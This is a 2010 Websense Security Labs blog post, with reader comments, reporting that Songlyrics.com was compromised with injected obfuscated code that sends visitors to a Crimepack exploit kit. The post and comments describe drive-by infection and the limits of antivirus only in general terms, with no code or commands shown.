• Search Blog Archives

  • Recent Posts

  • Archives

  • Categories

  • Websense

  • Security Sites

Follow us: 
Like us on Facebook Follow us on Twitter Visit us on YouTube Follow us on LinkedIn

Singing a malicious song
Posted: 16 Sep 2010 04:23 PM

 

Every now and then we look for song lyrics on the Internet. Using the newest Google Instant technology we immediately find what we need. At least, we think so.

 

Websense Security Labs™ ThreatSeeker™ Network has detected that the popular site Songlyrics.com (with approximately 200,000 daily page views and 2,000,000 unique visitors) is compromised and injected with obfuscated malicious code.
Websense customers are proactively protected against the malicious code by our  Advanced Classification Engine - ACE

 

Once a user accesses the main page of the song lyrics site, injected code redirects to an exploit site loaded with the Crimepack exploit kit.
Attempted exploits result in a malicious binary (VT 39.5%) file that's run on the victim's computer. Once infected, the machine becomes another zombie-bot in the wild.

 

 

Deobfuscating this code reveals a redirection to the malicious payload site:

 

 

It is interesting to note that the malicious code injected on Songlyrics.com uses a similar obfuscation algorithm as Crimepack - a prepackaged commercial software used by attackers to deliver malicious Web-based code.

It appears that the majority of pages served by Songlyrics.com are compromised.

Crimepack has become one of the best selling exploit packs on the market due to its huge number of pre-compiled exploits offering a great base for the "drive-by-download & execute" business implication.

 

 

Filed under: ,

Ivan Sabo

4 comment(s)

Comments

  Andres Valencia said on Thursday, September 16, 2010 2:47 PM

Thanks!

After a Google search for "Song Lyrics", my AVG Anti-Virus Free Edition did not warn me about the infection at www.songlyrics.com

  Mike Barwise said on Friday, September 17, 2010 2:54 AM

It would be interesting to know how the malicious payload site delivers the bot binary to the victim.

  Ivan Sabo said on Monday, September 20, 2010 3:09 AM

@Mike Barwise

The Crimepack has a huge collection of exploits. Once the visitor accesses the site, known vulnerabilities based on the browser are tested and the first one found used to deliver and quietly install the malicious binary on the victim's computer.

[!v@n]

Websense Security Labs

  Ivan Sabo said on Monday, September 20, 2010 3:10 AM

@Andreas Valencia

Unfortunately, AV software usually has no capability to detect such threats. AV engines are designed by default to deal with files already downloaded to the computer and have almost no ability to detect a data flow. Unless you have another level of protection you rely on the AV's coverage which can be often too late - the file has already been downloaded and saved on your computer.

Thanks

[!v@n]

Websense Security Labs



Leave a Comment

(required) 

Email address: (required) 
 
  
 


©2013 Websense, Inc. All Rights Reserved.